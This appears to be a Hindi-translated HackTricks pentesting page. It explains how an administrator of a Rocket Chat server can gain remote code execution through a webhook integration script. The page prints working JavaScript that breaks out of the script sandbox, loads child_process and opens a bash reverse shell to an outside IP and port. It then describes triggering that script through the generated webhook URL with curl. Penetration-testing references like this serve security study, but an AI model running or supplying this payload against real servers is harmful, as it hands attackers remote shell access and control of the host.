Hindi - Ht

Rocket Chat

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

RCE

अगर आप Rocket Chat के अंदर एडमिन हैं तो आप RCE प्राप्त कर सकते हैं।

  • Integrations पर जाएं और New Integration चुनें और कोई भी चुनें: Incoming WebHook या Outgoing WebHook

  • /admin/integrations/incoming

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

  • वेबहुक कॉन्फ़िगर करें (चैनल और पोस्ट के रूप में उपयोगकर्ता नाम मौजूद होना चाहिए):

  • वेबहुक स्क्रिप्ट कॉन्फ़िगर करें:

  • परिवर्तन सहेजें

  • उत्पन्न वेबहुक URL प्राप्त करें:

  • इसे curl के साथ कॉल करें और आपको रिवर्स शेल प्राप्त होना चाहिए

जीरो से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

PreviousPythonNextSpecial HTTP headers

Last updated